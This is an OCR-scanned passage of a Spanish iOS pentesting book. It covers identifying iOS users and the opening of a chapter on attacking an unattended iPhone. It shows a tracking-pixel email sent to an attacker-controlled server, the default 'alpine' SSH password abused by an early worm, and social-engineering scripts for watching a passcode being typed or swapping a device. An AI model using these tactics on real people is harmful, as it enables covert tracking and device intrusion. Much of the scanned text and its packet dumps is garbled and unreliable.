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Capítulo I. Identificando dispositivos ¡OS EE 


Capítulo I 
Identificando dispositivos iOS 


1. Identificación de dispositivos Apple 


Tras la lectura de este libro, conocer cuáles son los objetivos potenciales a la hora de realizar 
pentesting a un dispositivo Apple será fundamental. En este capitulo en concreto se van a mostrar 
las diversas formas de identificar a las personas que utilizan dispositivos 10S (ya sea iPhone, iPad 
o iPod Touch) en su día a día. Esto, añadido a las políticas de e 
muchas compañías, permilirá saber qué esquemas se utilizan y a quiénes se deben aplicar. 


Descubriendo dispositivos iOS en la misma red local 


En esta primera parte del capítulo se va a suponer que se busca dentro de la red aquellos dispositivos 
¡OS conectados. Esto, en caso de estar realizando una auditoria de seguridad de red, permitirá acotar 
objetivos para esquemas de ataque que se verán a posteriori. 


Por las direcciones MAC 


(maide tas formas más sencillas de identificas undisposilivo Apple osa través de la dirección MAC 
Las MAC Address que se utilizan en los equipos tiene unos bits dedicados al fabricante de las tarjetas. 
Estos bits se llaman O (Orriols ie)» definen la compañía que ha creado 
el hardware. En los equipos de Apple, como las tarjetas son fabricadas por ellos mismos, es fácil 
identificar a un equipo como un Apple, lo que puede ser muy útil en determinadas ocasiones. 


La mayoría de las aplicaciones de seguridad de red, como sniffers o escáneres, Ievan incluida una 
base de datos de OUI para hacer mucho más cómoda la visualización de datos, pero si no es así, hay 
herramientas que permiten la consulta online, ayudándo así a saber si una MAC Address pertenece a 
un equipo Apple o, cuales son los OUI de Apple, por poner dos ejemplos. 


Un A de dicha consulta online puede realizarse cn esta URI «hiipii coger comba i 
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Vendor/Ethernet/Bluetooth MAC Address Lookup and Search 


March your MAC address to its vendor. 
Match a vendor to the MAC addresses it uses. 
MAC Address or Vendor to look for: 


Searcia by webos. For examples pl or "les 
Search by MAC Address. tor exampie: D0: BASF 0""D0-80-C7"or "000420" 


vou wam t lockup MAC acidress "04.00:55.0201FC”, enter Herr E characters DENOTA", or full MAC address V5 00592:01:FC. 


atataso test updated rebrvary 19, 2010 


Search results for "apple" (Total: 54) 


Imagen 01.01: Direcciones MAC utilizadas por Apple. 


Además de poder identificar a un dispositivo 4pple en la red en la que se está, también es posible 
modificar la propia dirección MAC de algunos dispositivos para suplantar a otro fabricante o incluso 
a otro sistema operativo. A efectos prácticos, cualquier administrador de red avanzado será capaz de 
utilizar más herramientas para descubrir el engaño. pero esto puede servir en algunas siluaciones. 


Además hay 


Lste dato es muy interesante porque cicrto tipo de ataques B/uetooth necesitan saber la 
rección MAC de antemano. Por ejemplo, en un ¿Pad concreto se tienen las siguientes direcciones 
MAC: 


Tarjeta | Dirección MAC 
Inalámbrica (Wi-Fi) | B8:C7:5D:E0:0B:9E > 
Bluetooh k 


Por el protocolo Bonjour 


y de csta forma 


autoconfigurar muchos de estos servicios sin la interacción del usuario. 
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Para que pueda funcionar de forma correcta, Bonjour envia muchos paquetes en la red anunciando 
los servicios que cada dispositivo ofrece, o simplemente anunciando la existencia de los mismos. Ln 
el caso de cualquier dispositivo con ¿OS, esto siempre se comple. con lo que es una importante pista 
que indica que se está ante un dispositivo de estas características. 


njour utiliza el protocolo DNS para sus paquetes, con la ligera diferencia de que usa el 


En los paquetes Bonjour enviados. es posible encontrar detalles interesantes, como el nombre del 
dispositivo. y las direcciones IPv4 e IPv6 de los mismos. 


TP 10.0.1-6.5353 > 224.0.0.251.5353: 0% [04] 8/05 (Cache flush) TXT *", PTR 
apple-mobdev _tcop local PTR 
Be .c7:5d:e0: 0b; 3e0fe80 , :bəc7:5dff : fse0:b3e pea ecpolocal.. (Cacha 
flush) SRY Familys-iPad local :62078 0 pA p: flush) E 'amilys- 
iPad. local.. (Cache flush) PIR Femilys-iPad local., (Cache flush) ARMA 
fe80: A $a f:feæ0:b3e, (Cache ji EL Le EN 
: 4500 01d c06b 0000 f 
D0010. e000 Dire Ties 14e9 Últ Die? 0000 5400 
0x0020: 0000 0008 0000 0005 28262 3838 6337 3a35 “b8 ¡075 
00030: 643a 6530 3830 623a 3965 4056 6538 303a d:e0;Ub:9eatenú: 
Ox0040: 3a62 6163 373a 3554 E6€6 3as6 6565 303a :boc7:Sdff:fesl: 
0=0050: 6299 60d q fel 7070 6o65 aded G£62 blbe b9e _apple-ncbde 


0x0170: 2£80 0100 0011 9400 0920 0c00 0500 
0x0180: 0040 c0b0 002f 8001 0000 0078 0006 
0x0190: 0002 0008 c106 002£ 8001 0000 0078 
Ox0la0: ci06 0002 0008 cóal 002f 8001 0000 
0x01b0: 0008 c0al 0004 4000 0008 0000 2905 3 à 
Ox0lc0: 001i 9400 0c00 0400 0800 £f9b8 c75Sd e00b .-...........].. 


Imagen 01.02: Captura de um paquete de Bonjow 


De igual forma, también se pueden hacer peticiones al servicio Bonjour (mDNS) del dispositivo que, 
en caso de respuesta, permitirá conocer el nombre del mismo; para ello, como se ha mencionado 


r + 
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que Bonjour utiliza DNS, es posible usar una herramienta como ara hacer la petición, con las 
características que se comentaron anteriormente: dirección multicast 224.0.0.251 y puerto 5353. 


dis 0224 M0 251 -p5953 -x 10 011.6 


: gs» DiG 9.8.3-P1 <<>> @224.0-0.251 -95353 -x 10.0,1.6 


NOERROR. id: 9644 
ANTECRITO: 0. ADDITIONAL. 1 


—HEMER<<- opcod=: QUERY. status 
Fləgs: qr ea; (ER. l. ANSWER: 1 


QUESTION SECTION 


16.1.0. 10.ın aidr arpa. 1N PIR 
< ANSUER SECTION 
$1 010 ancaddr arpa. 10 IÑ è PIR  FamilysFai.local 


70 t 
0.1 -6f5353(224-0 0 251) 
àpr 11 19:28 45 2013 

MO SIZE rovi 71 


i: Query tine 
E VÉR: 10 


Por los puertos TCP abiertos 


F: 
decir, que si se dispone de un disposilivo que tiene el puerlo 2708 abierto, cs muy probable 
que sea un dispositivo iOS. Nmap por ejemplo, también es capaz de identificar un dispositivo ¡OS si 
tiene oste puerto abierto, (esto us debido a que Nmap necesita tener al menos un puerto abierto para 
poder hacer todos los tests de detección): 


¿ORT STATE SERVICE VERSION 
52078/tcp open  Ipaons-=ync? 
HAC àdóress: UC:74 C2:A4:43:D8 (Apple) 
Tsimins: buen resulis ray be unteliabls because ve oull not find at leest 1 
open and 1 closed port 
Device type: media dcvio=s|ykome 
Running: Apple 208 4X15 X]6 X 
05 CE: cpe /oiappls iphons_os:4 cpe:/a'apple:appls_tv:4 

:/0:apple:; 1; hone_os 5 cpe:“o:opple i osb 
(S dotaris. Apple Mac 05 X 10.8 0- 10.3.2 (Fountain Linn) or 105 4.4.2 - 
6-0.0 (Darvin 11.0.0 — 122.0 


Por defecto, existen dos usuarios en el dispositivo que poseen siempre la misma contraseña, 

son los usuarios por lo que en caso de existir un demonio 

SSH con estos usuarios y contraseñas puede indicar que es un dispositivo ¡OS 

De hecho, uno de los primeros gusanos para 105. asenaan esa niea pera encontrar infec 
Básicamente buscaba disposi con el puerto de $ 


22/tcp) activo en los rangos de red usados por las operadoras para 3G. Una vez que encontraba 
alguno, probaba a entrar como usuario 7007 y contraseña alpine, para poder infectarlo. 
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Utilizando Shodan 


También es posible encontrar terminales ¡OS en Internet mediante uno de los buscadores favoritos 
de muchos usuarios: Shodan. En el momento de escribir estas líneas, si se busca la palabra ¡Phone 
en el buscador aparecen: 


- 8 iPhones con servidor FTP 
- 168 ¡Phones con servidor web 


Coment Type sentra 
Coment Lenga: 1597 
are", 11 Ape 2013 0602:02 GMT 


Server Prone Web server (SMSLCASyy) 
Top Countries 


También es posible encontrar un ejemplo de un servidor mal configurado donde se puede acceder a 
todo el contenido de un iPhone: 


E Directory 
2013 Mar-2701:2432- Directory 


2013-MarI4 00:29:21- Directory 
2011-Det-06 03:31:460.1Kapplication/octetsweam 
2012-Jan-12 22:55:25 O OKapplication/octet-sweam 


imum? 2012-an-12 22:5525 O DK plot 
iPhone Web Server (SMSLockSys) 


Fvidentemente, no es un descubrimiento de dispositivos en la red local, sino a través de Internet, 
pero la posibilidad de buscar en Shodan con el modificador net (permitiendo acotar las búsquedas a 
las direcciones IP de la red objetivo), podría determinar si alguno de ellos está siendo utiliza en ella, 


2. Identificar si un usuario utiliza un dispositivo iOS 


En este caso, el punto de vista de este apartado trata de reconocer si una persona está utilizando un 
dispositivo ¡OS o no. En una auditoria de seguridad la aproximación sería descubrir a los empleados 
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de una empresa, utilizando alguna red social profesional como Linkedln y después analizar las 
interacciones de esa persona en las redes sociales para descubrir si es usuario o no de ¡OS. 


Por el sistema de mensajería ¡Message 


¡Message es cl cliente de mensajería que se utilizan tanlo en iOS como en OSX. Desde cualquier 
terminal de ¡OS, si el destinatario del mensaje utiliza también el mismo sistema operativo, en vez 
de enviar un SMS se enviará un mensaje por la red. Tanto la aplicación de ¡OS como la de OSX 
permiten saher si el destinatario utiliza también ¡Message (y por supuesto, OS). Basta con observar 
a la hora de crear un nuevo mensaje que existe una pequeña burbuja ul lado del número de teléfono, 
que indicará que el destinatario soporta iMessage: 


(Atusar 


fi E David Barroso +34 678 70MM ¡Message 19 
David Barroso ` E ¡Message 


David Barroso ¡Message 9| 


Por los clientes de redes sociales para iOS 


Existen muchas aplicaciones en Internet donde es posible identificar que una determinada persona, 
está utilizando un dispositivo ¿OS debido al cliente que utiliza de esa aplic: . Un caso muy 
ilustrativo es Twitter, donde dentro de los metadatos de cada nwee! que se publican, se encuentra 
el cliente utilizado para cllo. De esta forma, es posible identificar el sistema operativo que está 
utilizando una persona simplemente mirando este tipo de metadatos. 


En el caso de FaceBook, ya desde 2011 cambiaron la información que se ofrecía al incluir contenido 
en la red, pasando de “via iPhone” a “via FaceBook mobile” Por ejemplo, justo cuando Alicia Keys 
fue nombrada Directora Creativa Global de B/ackBerry, publicó algún tweet donde se podia ver que 
había sido enviado desde un iPhone, Más tarde lo intentó arreglar diciendo que su cuenta habia sido 
comprometida. 


February 11, 2013 at 9:10 AM 


Started irom the bottom now were here! 


GaLeadoxA | ..|-%-) 
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el User-Agent del navegador 


de las formas comunes de poder detectar si alguien está usando un dispositivo ¡OS es a través 
las cabeceras HTTP, concretamente el User-Agent. De hecho, es interesante comentar que en esta 
cera se incluye información hasta de la versión del sistema operativo que está siendo utilizado, 
se tiene por ejemplo una petición reciente como esta: 


0 (iPad: CPU OS 6: 
Eko) Version/6.0 Mobile/10B 


Mac OS X) AppleWsbx: 
Safari/8536.25 


/53€.26 (XETML, like 


puede apreciar claramente el modelo (iPad), la versión del sistema operativo (6.2.3), así como 


mlan un contenido u otro. Por ejemplo Google utiliza el siguiente User-Agent para 
simular ser un dispositivo ¡OS: 

Mozilla/5.0 PU iPhone OS 4 1 like 
(RITA, 


G phone; 
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El cliente de correo de iOS 


y también es posible 
aprovecharse de algunas de sus características para poder identificar si un usuario esta utilizando 
este sistema operativo. 


¡na de las 
scria ver las cabeceras del correo. MobileMail suele usar una cabecera como 


la siguiente: 
X-Mailer: iPhone Mail (108144) 


Pero no siempre será posible acceder a un correo de este usuario, Una opción más interesante es 
aprovechar una configuración por defecto que tiene MobileMail en la que automáticamente carga 
todas las imágenes que tenga el correo electrónico. De esta forma, un atacante podrá enviarle un 
correo con una imagen incrustada que apunte a un servidor web que controle dicho atacante, y asi 
este podrá ver luego la petición HTTP que realiza el usuario para descargar esa imagen. 


Por ejemplo, si se crea un correo que tenga cl siguiente contenido: 


<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” 
"http: //www.93.org/7R/xhtml-/07D/xhtm11 ansitional.dtd”> 
<html xmlns="http://www.w3.org/1999/xhtm 
<head> 

<meta http-equ 
<title>Urgente< 
</head> 

<body> 

<hl>Alea jacta est</al> 

<img sro="http://www.midomínio.com/chungo.jpg”> /> 
</body> 

</html> 


content="Lext/kuml; charseteut£-9” /> 


[11/apr/2013:20:11:56 +0200] “GET ungo. 
(iPhone; CPU iPhone OS 6_1 like Mac OS X) 
Mobile/108144” 


Por defecto viene activada la carga automática de imágenes en MobileMail, aunque es posible 
desactivarla en la configuración; ahora bien, en caso de realizar dicha desactivación no solo no se 
podrá ver ninguna imagen de ningún correo, sino que tampoco se cargará ningún archivo JavaScript 
o CSS, con lo que la experiencia del usuario se degradará notablemente. 


Por último, también es posible identificar a un usuario de ¡OS por las famosas firmas de correo como 
“Enviado desde mi iPhone” o “Enviado desde mi ¡Pad”. Una simple búsqueda en Google en un 


repositorio de listas de correo como vuelve más de 500.000 resultados de 
correos con “Sent from my iPhone” y más de 40.1 le “Sent from my ¡Pad”. 
EEE 
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Cargar imágenes 


Organizar cadenas 


Imágenes publicadas 


gunos si 
estos metadatos, pero en algunas ocasiones sí que es posible acceder a esta información. Por ejemplo, 
en el caso de una fotografía realizada por un ¿Phone, dentro de los datos EXIF, se pueden observar 
diversos detalles que permitan identificar, (entre otros muchos datos). el modelo del dispositivo 
empleado: 

Make 

Camera Modul Ye 
Orientation 
Aperture 

GPS Allitude 
GPS Latitudea 
GPS Longitude E 
GPS Puvilicn 50 deg 5' 15 
Tmage Size 2 2592x1936 


5* 16.20% E 


K 


Este caso concreto sucedió en la fuga de John McAfje, programador estadounidense y fundador de 
la empresa de antivirus McAfee, perseguido por la justicia y huido del país. Una fotografía realizada 
con el iPhone 45 del periodista que lo entrevistó, no solo dejaba a las claras el terminal ¿Phone que 
usaba, sino que además se pudo ver la información GPS de la ubicación en la que se encontraba, que 
resultó ser Guatemala. 4 
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Compartición de Internet por Wi-Fi 


Normalmente, los terminales ¿Phone acaban llamándose “iPhone de Antonia” o “iPhone de Susana”, 
es decir, el nombre del propietario del mismo. Este nombre es el que por defecto va a utilizar el 
servicio de Internet Terhering, o de “Compartir Internet” a través de iPhone, para identificar la red 
Wi-Fi que se publica. 


Esto puede traer situaciones curiosas en algunos entornos que pueden ayudar a localizar a una 
persona en una oficina, en una sala de conferencias o en un medio de transporte. Los comerciales 
más avispados, revisan las redes Wi-Fi que se publican en los bares o en las oficinas, para poder 
localizar si el señor X, al que tienen que visitar, está o no por los alrededores. 


Wi-Fi: activado 
Desactivar Wi-Fi 


Ninguna red seleccionada 
AndroidAP 

iPhone de HERMINIO CANO 
¡Phone de ROBERTO PARRRA 
Secureap 

VisionMobile2021 


Acceder a otra red... 
Crear red... 
Abrir el panel de preferencias Red... 


Imagen 01.11: Heminio Cano y Roberto Parra presentes 


Tencer encendida la Wi-Fi en ¿Phone es algo que consume mucha batería y expone la información 
Bluetooth. En caso de que se vaya a compartir Internet, un usuario tiene la posibilidad de evitar los 
ataques innecesarios que pueda querer hacerle cualquier atacante cercano, conectando el terminal 
por USB. Una opción para un usuario que no quiera ser localizado y tenga que conectar el servicio 
por Wi-Fi, consiste simplemente en cambiar el nombre al dispositivo por algo que no identifique a 
dicho usuario, teniendo que acordarse de apagarlo después de su utilización. 


No-tech hacking 

Por último, siempre queda la opción más sencilla de todas, que no requiere de ninguna complejidad 
técnica. Si se dispone de alguna foto del objetivo en donde aparece con un ¿Phone o con un iPad, ya 
sea en sus manos. o en su habitación, es muy probable que sea su teléfono de uso habitual. Es fácil 
ver a famosos con sus terminales en la mano, por ejemplo. í 1 
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Capítulo II 
Ataques locales 
(iPhone Local Tricks) 


1. Introducción 


En un proceso de pentesting. cuando se está haciendo la auditoría interna, tal vez sea necesario sacar 
información de un terminal ¿Phone (o iPad) al que se tiene acceso solo durante unos minutos, por 
ejemplo porque se ha ido su ducño un momento al baño, y el atacante se ha quedado solo en una 
sala de reuniones esperándolo, o por cualquier otra circunstancia. En esos momentos no se puede 
hacer un volcado del disco del terminal, o realizar un Jailbreak, o un hackup, y solo se tienen unos 
instantes de tiempo para manipular el terminal y dejarlo como estaba antes de que venga el dueño 
del mismo. 


Por supuesto, aunque no se pueda acceder a todos los datos que se esconden el terminal. tal vez sea 
posible llevarse algo de información útil sin tener que robar el terminal, poniéndose asi el atacante 
en una situación comprometida. Si además se han seguido los pasos adecuados y se ha estudiado al 
objetivo previamente, averiguando la versión exacta de ¿OS que tiene su ¿Phone, su ¿Pod Touch o su 
iPad, puede que sobre tiempo para hacer otras cosas después de sacar la información. 


¿Qué información es posible extraer de un terminal que esté bloqueado con el passcode sin hacer 
un Jailbreak al dispositivo? Lo cierto es que hay varias estrategias de ataque en las que influye la 
configuración por defecto del terminal. las aplicaciones que haya instalado el usuario y la versión 
exacta de parcheo del sistema operativo (ya que versión tras versión han ido apareciendo fallos de 
seguridad que permiten desbloquear un ¿Phone o un iPad sin conocer el passcode). 


En este capítulo se mostrarán cuáles son las debilidades de configuración y los fallos de seguridad 
que se conocen de las últimas versiones de iOS, dejando al lector la labor de preparar la estralcgia de 
un ataque para que funcione en los minutos que se tengan disponibles para manipular el dispositivo. 


Se recuerda que para conocer la versión exacta del sistema operativo del objetivo a atacar, solo hay 
que conseguir que la víctima se conecte a un servidor web controlado (mediante un link por Twitter 
o un mensaje acortado) y analizar el User-Agent de la conexión, tal y como se ha visto y se mostrará 
en otros capítulos de este libro. 
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Reconocer el modelo de dispositivo en una inspección preliminar 


Un ojo bien avezado puede obtener mucha información de un terminal ¿Phone solo con verlo. Se 
recomienda conocer bien los modelos de ¡Phone (v iPad) para saber qué versión de sistema operativo 
se encuentra en cada uno de ellos. A día de hoy lo más común que se puede encontrar son cquipos 
iPhone 5, iPhone 45, iPhone 4 y algún iPhone 3GS. 


Reconocer un ¿Phone 5 es fácil, ya que es más estrecho y alargado que el i/'hone 4 o iPhone 45, 
famoso por tener la antena alrededor del terminal. El iPhone 3GS es el que tiene los laterales 
redondeados, al igual que el ya abandonado ¡Phone 3G. 


iPhone 5 iPhone 46 iPhone 4 


Im 


u 02.01: iPhone 4, iPhone 45 e iPhone 5 diferenc 


as. 


Diferenciar fisicamente un ¡Phone 4 de un iPhone 45 es posible, ya que basta con mirar los cortes 
en la antena que rodea al teléfono. En ¿Phone 4 hay dos cortes, uno en la parte superior y otro en 
el lateral de los botones. Por el contrario, en el ¿Phone 48 los dos cortes se encuentran en el mismo 
lado, es decir, en el lado de la botonera. 


Imagen 02.02: Los laterales del ¿Pad / son rectos. 


En el caso de iPad, reconocer los modelos con una inspección preliminar también es posible. El 
primer iPad, (al que llamaremos ¿Pad 1). es el único que tiene los laterales rectos, mientras que el 
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resto de los modelos ticnen los laterales redondeados y solo se vendió en color metálico. ¿Pad 2 es el 
modelo que lleva la Smart Cover, es decir, la protección magnética que interactúa con el dispositivo 
solo cn la parte delantera y además es el más delgado de todos. 


Imagen 02.03: ¿Pad 2 junto a un iPad 3. 


¿Pad 3, o new iPad, salió con Smart Cover delantera y trasera y se diferencia de ¡Pad 2 en que mide 
6 milímetros más de grosor y tiene ligeramente distintos los bordes de las esquinas y por detrás. 
¿Pad 1 leva una pestaña negra en la parte superior. Diferenciar ¿Pad 3 del New new iPad es posible 
porque este último lleva el conector /ig/rming al igual que ¿Phone 5. Por último ¿Pad mini es el ¿Pad 
pequeño y a día de hoy solo hay una versión en el mercado. 


Imagen 02.04: ¡Pad 3 y New new iPad. 


Hay que tener cn cuenta que si tiene una funda que no es la estándar cs una buena noticia para 
el alacante puedes tener que ser bueno. Reconocer la versión hardware es importante, ya que así 
es posible saber más y menos con qué versión de ¿OS se va a encontrar. Esto es así debido a que 
las versiones que se pueden instalar en un terminal concreto sin manipularlo con Jailbreak están 


limitadas, La siguiente tabla recoge las versiones que pueden estar instaladas en cada versión del 
terminal. 
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Modelo | Versión de sistema operativo ¡OS que puede tener instalado 
¡Phone 5 10S 62i086.13 
[iPhone 45 ¡OS5Ri0S6L3 
iPhone 4 108421056.1.3 SEN] 
¡Phone 3GS 10S 3 a iOS 6.1.3 


NewnewiPad |1056, i056.1.3 
iPad 3 (new iPad) | i0S 51 a i08 6.1.3 


iPad 2 iOS 4.3 a iOS 6.1.3 E — 
| iPad 2 |10S3Xai0S5.1.1 
¡Pad mini iOS 6 a iOS 6.1.3 


Tabla 02.01: Versiones soportadas de ¡OS por los diferentes modelos de iPhone o iPad. 


Como se puede ver, iPhone 3GS es el que más variedad de versiones soporta. Se han dejado fuera 
de este estudio las versiones de ¿OS soportadas de ¿Pod Touch. y los iPhone CDMA, estos últimos 
solo utilizados en Estados Unidos para comunicaciones de voz sobre redes Wi-Fi. Además, hay que 
tener en cuenta que, a pesar de que ¡Phone 3GS, ¡Phone 4 o iPad 2 soportan ¡OS 3 0 iOS 6, este 
viene con limitaciones y no existen funciones de mapas ni Siri, que como ya se verá es muy útil en 
un proceso de pentesting. 


En ¡OS 6.1 se ha introducido una nueva forma de reconocer el sistema operativo, ya que se ha 
cambiado el aspecto del reproductor de música, así que basta con hacer dos clics en el botón de 
acción para acceder al reproductor y saber qué versión es. Si tiene el nuevo (más minimalista) es la 
versión ¡OS 6.1 o superior. Además, es posible acceder al último recurso que se ha visitado, y esto 
puede ser hasta un vídeo de Internet, donde se podría saber qué estaba haciendo el usuario. 


: Reproductor de ¡OS 6.7 en el que se ve la URL de un video y reproductor de versiones anteriores. 


De todas formas, si el atacante se tiene que enfrentar a un dispositivo ¡Pod Touch, ¡Phone CDMA 
o Apple TV y quiere saber qué versiones de ¡OS podria estar corriendo, puede ir a la fecha de 
lanzamiento del producto en Wikipedia y buscar dicha fecha en htp:/support.Apple.comíkb/ 
HT1222, que mostrará cuando salió cada actualización de OS. Se puede apreciar que siempre hay 
una versión que coincide con la fecha del lanzamiento del producto. 
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Los números de serie y el IMEI 


Como todo terminal de telefonía, los modelos de ¿Phone tienen un número MEL (Pitermational! 
Mobile Equipment Ideni y los Números de Serie de fabricación. listos números pueden ser 
utilizados para trazar la línea de la historia del dispositivo, que va desde las características de 
fabricación hasta su dueño punto de venta, siendo también posible para reconocer el terminal en las 
redes de telefonía por medio del IMEI y, eventualmente, bloquear el dispositivo cuando haya sido 
robado o perdido 


Imagen 02.06: Números de scrie de un iPad. 


Las ubicaciones del IMEI cambian dependiendo del modelo. pero todos están en el terminal. Ln 
iPad y en iPhone 5 los números IMFI están en la parte posterior del terminal, mientras que en los 
¡Phone 3G, iPhone 3GS, iPhone 4 y en los iPhone 45 hay que sacar la tarjeta SIM, ya que está cn la 
carcasa. Para ello se debe llevar la llave de apertura de la SIM entre las ganzúas de Lockpicking (esta 
lave es útil si además se desca realizar algún ataque que se mostrará más adelante). e introducirla en 
el agujero que hay en la ranura lateral de la SIM. 


Imagen 02.07: Número de serie en bandeja de la SIM y llave para extracción. 
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Si no se dispone de una llave a mano, siempre se puede utilizar un clip, e introducirlo con mucho 
cuidado. En la web de Apple están las explicaciones para cada modelo, pero todos son básicamente 
igual, simplemente hay que buscar el agujero, meter la llave, hacer clic y sacar la bandeja, 


Imagen 02.08: Proceso de extracción de SIM. 


Los números de serie pueden ser obtenidos con solo visualizar la parte posterior del teléfono, así 
que para tenerlos bien inventariados en un análisis forense o utilizarlos cuando sea preciso (como 
por ejemplo para “dar un cambiazo” posteriormente y llevarse el correcto) o realizar un ataque de 
ingeniería social del tipo: 


“Hola, somos de Apple y hemos detectado que su modelo tiene un fallo de fabricación y le vamos a 
llevar un iPhone 5 en sustitución a todos los clientes cuyo número de serie acabe en X”. 


Imagen ipción completa de un 


Capitulo l. Ataques locales (iPhone Local Tricks) 


Estos datos, por lo que se pueda necesitar en el futuro, se pueden obtener rápidamente haciendo una 
fotografía a la parte posterior del dispositivo del objetivo. Además, el código IMEI puede servir para 
conocer en detalle las características fisicas del terminal, y saber entre otras cosas si es un ¿Pad 3, o 
un New new ¡Pad y si tiene 3G o solo Wi-Fi. 


Para ello se pueden utilizar múltiples bases de dalos de consulta de información rminal a 
partir del código TMIFI en Internet. Para este ejemplo se ha utilizado y tras 
introducir el valor del IMEI se obtendrán todas las características del modulo. Esta base de datos 


tiene limitado el número de consultas por dia, pero además permite saber si el IMLL está bloqueado 
en los operadores por alguna denuncia de robo. 


Códigos de marcado especiales 


En ¿Phone, como en muchos de los terminales, se pueden utilizar códigos de marcado especiales que 
pueden ser utilizados desde la aplicación de realización de llamadas. Esto permite. (a pesar de que no 
se haya conseguido desbloquear Lodo el terminal con un bug), el poder lanzar comandos desde dicha 
aplicación allí. Estos códigos los hay para la realización de llamadas y para el envio de mensajes 
SMS y, dependiendo del operador de telefonia funcionarán unos u otros. La lista de códigos que se 
pueden utilizar es: 


Cádigo Utilidad 
4061 Muestra el IMEI del terminal. 


+30014123454 Muestra el Field Test, que será de gran ayuda para los ataques de una 
DN estación de telefonía falsa, como ser verá más adelante en este libro. 


Muestra si existen desvíos de llamadas para diferentes servicios 


i activados. 
443 | Muestra la lista de llamada en espera. 
EAN Muestra la configuración de ver el número de quién te está llamando. 
433% Muestra configuraciones especiales de iPhone. 
| #3 Itmúmero [Permite hacer una Mamada oculta al número que se marque 
04 Fan 
ARE aiae y | Cambia el valor del PIN. 


Tabla 02.02: Lista de códigos de marcado especiales. 


Estos códigos no son únicos de iPhone, y según los operadores se ofrecen más o menos códigos, 
por lo que es muy interesante averiguar antes el operador al que se conecta este terminal. Listo es tan 
sencillo como ver la red a la que se conecta o hacer un ataque Client-side tal y como se ve en otro 
capítulo, usando por ejemplo un correo electrónico o un hiperenlace para averiguar a qué operador 
pertenece la dirección TP por la que se conecta el dispositivo. 


A 
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2. Adivinar el passcode de un iPhone 


En este apartado se realizará una descripción sobre los distintos métodos que pueden ser empleados 
para averiguar del sistema operativo iOS. 


Shoulder Surfing 


Para intentar sacar datos de un objetivo en concreto hay que prestar mucha atención al passcode 
de la víctima. Para ello, conviene preparar una estrategia sencilla que permita estar cerca de dicha 
victima cuando vaya a interrrupirlo, Esto se conoce como Shoulder Surfing, o simplemente, “Mirar 
por encima del hombro”. ẹ i 


La forma más sencilla es programar un Tweet, un SMS, o un Whatsapp para que le llegue a la 
víctima cuando el atacante esté presente. Una forma que tiene dicho atacante de hacerlo es (en caso 
de tenerlo escrito) enviarlo disimuladamente cuando se esté en la mejor posición y utilizar un poco 
de ingenicría social del tipo: “Te lo envié antes de venir”. En caso de utilizar este truco, está bien que 
antes de enviarlo se le diga a la víctima algo como “¿No te ha llegado el mensaje que te envié esta 
. Todo el mundo está acostumbrado a que cso sea un caso normal, así que no se extrañará 


mañana? 
para nada. 


Para hacer esto es posible incluso usar los servicios de las operadoras que permiten diferir la entrega 
del SMS. Por ejemplo, en Movistar, para retrasar la entrega de un SMS 1 hora basta con comenzar 
el me con *POST 1#Mensaje. 


Shoulder Surfing con iSpy 


Como manera avanzada de hacer Shoulder Surfing en dispositivos iPhone, (debido al especial 
funcionamiento del teclado y a lo estandarizado en los modelos), es utilizar una herramienta llamada 
¡Spy que permite reconocer lo que una persona está tecleando a partir de una grabación de vídeo. En 
este caso, preparar una estralegia es mucho más complicado y solo podrá utilizarse cuando haya una 
cámara de vigilancia o un entorno especialmente preparado, por ejemplo en una sala de reuniones 
donde se haya montado un sistema de grabación previamente. i 


Imagen 02.10: Proceso de reconocimiento de teclado de iPhone en video con iSpy. 
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El estudio se hizo en la Universidad de Carolina del Norte cn Chapel Hil, y se puede ver un video de la 
demostración en la siguiente URL: hrp:/AwwwseguridadApple.com/2011/11/iSpy 
do-tecleado-en-un.html 


Reconocimiento de la complejidad del passcode 


Los terminales ¿Phone, dependiendo del tipo de passcode que se haya configurado van a mostrar 
un teclado totalmente distinto, así que si prestando atención a la pantalla se sabrá si merece la pena 
intentar averiguarlo o no. Lo más habitual es que el passcode tenga cuatro dígitos numéricos, y si 
esto es así se podrá ver un teclado solo de números en el que hay cuatro casillas totalmente separadas. 


Sin embargo, si se ha configurado un passcode complejo, en el que el número tiene más de 4 cifras, 
entonces las cajas se convertirán en una sola de entrada de datos sin delimitación alguna entre cada 
una de las posiciones. Por último, el escenario más complejo mostrará un teclado alfanumérico. 
Adivinar el passcode en este caso suele ser muy dificil, así que en tal caso el atacante puede optar 
por pensar en otras estrategias de ataque. 


Enter Passcode | Enter e | Enter Passcode 


as a e 
1 


5 3 apconounag 
E  ([B60G0008 
El 9 


20900000 = 
E + 


Imagen 02.11: Diferentes teclados en función de la complejidad del passcode. 


A pesar de que tenga passcode el terminal, muchos usuarios por comodidad optan por dejar una 
configuración insegura de no bloquear con passcode hasta pasado un minuto, así que si el dueño del 
terminal acaba de dejar bloqueado el teléfono y el atacante tiene tiempo, conseguirá entrar antes de 
que se hloquee el dispositivo. 


Saber si tiene Wi-Fi o no 

Una de las cosas que se mostrará más adelante es que es importante conocer a qué redes Wi-Fi se 
puede conectar un iPhone. Para ello, cuanto se Lenga un ¿Phone o iPad delante hay que procurar 
fijarse si está conectado a una red Hi-Fi o no. Esto se ve con un icono que aparece en la parle superior. 
Si lo está, entonces es más útil que el atacante averigúe qué redes inalámbricas hay operando en esa 
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zona. Esto es importante para poder hacer ataques que se verán más adelante (como el del Rogue 


AP), o para poder tener acceso al dispositivo por medio de OpenSSH por Wi-Fi. 


Es importante apuntar las redes Wi-Fi ocultas en este proceso, para lo que será conveniente que el 
atacante “sniffe” durante algún tiempo el espacio. Además, en caso de tener ocasión es recomendable 
apagar el dispositivo y volver a encenderlo. Esto hará que el terminal se conecte a la red Wi-Fi 


aunque no se haya puesto el passcode, lo que permitirá saber exactamente qué redes busca. 


Item Accessible 

Wi-Fi passwords After first unlock 

Mail accounts | After first unlock 
Exchange accounts After first unlock 
"VPN certificates Always, non-migratory 
VPN passwords After first unlock 
LDAP, CallDAV, CardDAV After first unlock 
iTunes backup = When unlocked, non-migratory 
Voicemail Always 

Safari passwords When unlocked 
Bluetooth keys non-mig 


Apple Push Notification Service Token E Always, non-migratory 


¡Cloud certificates and private keys Always, non-migratory 
¡Message keys e Always, non-migratory. F 
Certificates and private keys (Configuration Profile) Always, non-migratory 
SIM PIN Always, non-migratory 


Imagen 02.12: Niveles de protección de contraseñas. 


Respecto a las contraseñas de la red Wi-Fi hay que tener en cuenta que las contraseñas en ¡OS, debido 
a Data Protection, se liberan dependiendo de su nivel de configuración en diferentes instantes. Los 


